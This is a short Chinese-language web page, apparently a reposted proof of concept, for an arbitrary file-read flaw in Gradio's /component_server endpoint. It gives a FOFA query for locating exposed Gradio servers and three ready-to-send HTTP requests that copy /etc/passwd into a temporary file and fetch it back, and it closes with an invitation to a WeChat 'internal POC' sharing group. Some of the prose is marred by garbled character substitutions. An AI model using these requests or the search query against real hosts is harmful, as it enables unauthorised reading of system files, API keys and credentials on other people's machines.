赞
踩
Gradi0是一个开源的 Python库,用于创建机器学习模型的交互式界面。它使得展示和测试模型变得简单快捷,无需深入了解复杂的前端技术。广泛应用于数据科学、教育、研究和软件开发领域,尤其适合于快速原型设计、模型验证、演示和教学。
Gradio的/component server接囗不正确地允许使用攻击者控制的参数调用Component类的任何方法。具体来说,通过利用
BlocK类的move resource to block cache()方法,攻击者可以将文件系统上的任何文件复制到临时目录,然后检索它。该漏洞允许未经授权的本地文件读取访问,尤其是当应用程序通过launch(share=True)暴露到互联网时,从而允许远程攻击者读取主机机器上的文件。此外,托营在huaginaface.co
上的aradi0应用也受到影响,可能导致敏感信息,如存储在环境变量中的AP|密钥和凭据的泄露.
FOFA:body="__gradio_mode__"
1、请求/config文件获取components的id值
GET /config HTTP/1.1
Host: your-ip
2、携带获取得id值将/etc/passwd文件的内容写入临时文件
POST /component_server HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Type: application/json
Accept-Encoding: gzip
{"component_id": "id值","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "a"}
3、读取文件
GET /file=返回的路径 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Accept-Encoding: gzip
请使用VX扫一扫加入内部POC
分享圈子
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。